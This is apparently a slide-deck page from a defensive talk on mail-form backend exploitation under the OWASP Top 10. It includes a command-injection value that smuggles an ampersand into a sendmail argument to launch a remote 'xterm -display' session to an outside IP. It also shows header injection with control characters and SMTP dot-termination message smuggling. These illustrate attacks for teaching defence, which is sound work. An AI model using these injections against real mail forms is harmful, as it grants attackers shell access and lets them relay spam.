60 likes | 77 Views
Learn to avoid backend exploitation of mail forms as per OWASP Top 10 lists, protecting against vulnerabilities like unvalidated user input and injection flaws. Understand how mail forms work, identify exploits like unvalidated user input, broken access control, and injection flaws. Get insights on manipulating user input on the command line and avoiding control characters in email addresses.
E N D
Max Kessler, LPIC-1 Avoiding BackendExploitation of Mail Forms
OWASP Top 10 List • #1 Unvalidated user input • #2 Broken access control (sort of) • #6 Injection flaws
How do mail forms work? • A user types in their name, address and a message. • Their data are sent to the web server in an HTTP request. • The server runs a script that formats the text for consumption by a mail server, then feeds it to the mail server.
User input on the command line Exploit 1: insert semicolon/ampersand The command should be: /bin/sh /usr/sbin/sendmail -f max@example.com \ user1@example.com The command is: /bin/sh /usr/sbin/sendmail -f max@example.com& \ xterm -display 192.168.0.201:0&echo \ user1@example.com
Replay with control characters Exploit 2: insert control characters E-mail address should be: max@example.com E-mail address is: max@example.com To: user2@example.com, user3@example.com
Starting a new message Exploit 3: using '.' to start a new message SMTP servers allow multiple messages to be sent through a single connection. A new message is started by putting a '.' on a line by itself.